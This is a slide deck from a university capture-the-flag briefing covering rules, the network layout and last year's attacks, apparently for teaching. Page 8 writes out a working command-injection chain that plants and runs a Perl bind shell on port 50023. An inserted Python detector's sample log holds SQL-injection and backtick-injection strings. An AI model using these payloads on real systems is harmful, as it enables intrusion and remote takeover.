
Page 1

CTF

Mike Gerschefske

Justin Gray

Page 2

What is it?

Came from Defcon
UCSB sp0nsorz – won last year’s Defcon
Test skills of understanding security

What it’s not!
See who’s 1337 or l4am3r through script kiddie techniques

Page 3

Rules

Don’t be lame
  This includes (D)DoS – unfair bandwidth practices
  Circumventing the private network and using a public IP address (not cool)
Illegal stuff is not a good idea
  E.g. don’t hack the power grid

Page 4

Everything else is legal!
  At Defcon a team reverse engineered the score system and generated tokens.
  People got upset, but it was legal.
Can root boxes but not what’s being tested.
  w00t

Page 5

Last year’s event

Have to assume this year is similar
We p0wn3d the easy parts
  SQL injection
    Example: http://128.198.61.43/~estore/cgi-bin/login.php
  Exploit unchecked user input
  Security through obscurity
    OMG – this really works!!!
    Perl example

Page 6

[Network diagram: Test Network and Real Network. Nodes shown: Image (10.10.1.2), Vuln (10.10.1.3), Team (10.10.1.4), Hub, Team Box (10.10.1.1), Mon Box (10.10.1.x), Attack Boxes, Console for Fixes, Image Test Box, Vuln Patch Test, Vuln Attack Box, UCCS Boxes]

Page 7

Network Topography

Effectively created a two-directional NAT.
Blocking IP addresses is futile
  All traffic comes from the SAME IP
  Forces packet inspection

Page 8

The example

http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`echo%20-e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c=new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)->accept){\n\044~->fdopen(\044c,w)\073\nSTDIN->fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n\175\n\175\n"%20>%20final.pl`

http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`chmod%20755%20final.pl`

http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`final.pl`
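The point of page 7 (every request arrives from the same NAT address, so blocking by IP is futile and the request content itself has to be inspected) and the backtick injection shown above are tied together in this added example, which is not part of the original slides: a small Python inspector that decodes query parameters from access-log lines and flags shell command substitution and a basic SQL tautology. The log lines, hosts, paths and timestamps are constructed for the example.

```python
"""Content-based request inspection for a CTF web service.

Flags requests whose decoded query parameters carry shell command
substitution (`cmd` / $(cmd)) or an SQL tautology, regardless of the
source IP, which is identical for every request behind the CTF NAT.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access log (NCSA common log format); all values hypothetical.
SAMPLE_LOG = """\
10.10.1.1 - - [01/Jan/2005:12:00:00 -0700] "GET /~guestbook/cgi-bin/guestbook.pl?guestbook=hello HTTP/1.0" 200 512
10.10.1.1 - - [01/Jan/2005:12:00:01 -0700] "GET /~guestbook/cgi-bin/guestbook.pl?guestbook=%60chmod%20755%20final.pl%60 HTTP/1.0" 200 64
10.10.1.1 - - [01/Jan/2005:12:00:02 -0700] "GET /~estore/cgi-bin/login.php?user=admin&pass=%27%20OR%20%271%27%3D%271 HTTP/1.0" 200 2048
10.10.1.1 - - [01/Jan/2005:12:00:03 -0700] "GET /~estore/cgi-bin/login.php?user=bob&pass=s3cret HTTP/1.0" 302 0
"""

# Client IP, then the request target of a GET/POST line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# Indicators are matched against the *decoded* parameter value, not the raw URL.
SHELL_SUBST = re.compile(r"`[^`]*`|\$\([^)]*\)")                    # `cmd` or $(cmd)
SQL_TAUTOLOGY = re.compile(r"'\s*(?:OR|AND)\s+'?[^'=]*'?\s*=", re.I)  # ' OR '1'='1


def inspect_request(url):
    """Return a list of (parameter, indicator) findings for one request target."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; a second pass catches double-encoding
        if SHELL_SUBST.search(value):
            findings.append((name, "shell-command-substitution"))
        if SQL_TAUTOLOGY.search(value):
            findings.append((name, "sql-tautology"))
    return findings


def scan_log(text):
    """Return {request_target: findings} for every suspicious line in an access log."""
    hits = {}
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src_ip, url = m.groups()  # src_ip is the same on every line, so it carries no signal
        findings = inspect_request(url)
        if findings:
            hits[url] = findings
    return hits


if __name__ == "__main__":
    for url, findings in scan_log(SAMPLE_LOG).items():
        print(url, findings)
```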

Page 9

The basstard demo

W00t
http://128.198.61.43
SQL injection
Unchecked code injection
File upload!!!
Buffer overrun
Security through obscurity revisited
  http://128.198.61.43/test/ccauthd/ccauthd.c

Page 10

Backups

Page 11

Network Topography

Page 12

So you wanna be a h4x0rz?

Here’s what you need!
  vi – or any editor
  a browser – or anything to do http
  a compiler (depends on the situation)
  a debugger (optional)
  a clue!
Dumpster diving is cool
Getting information from the inside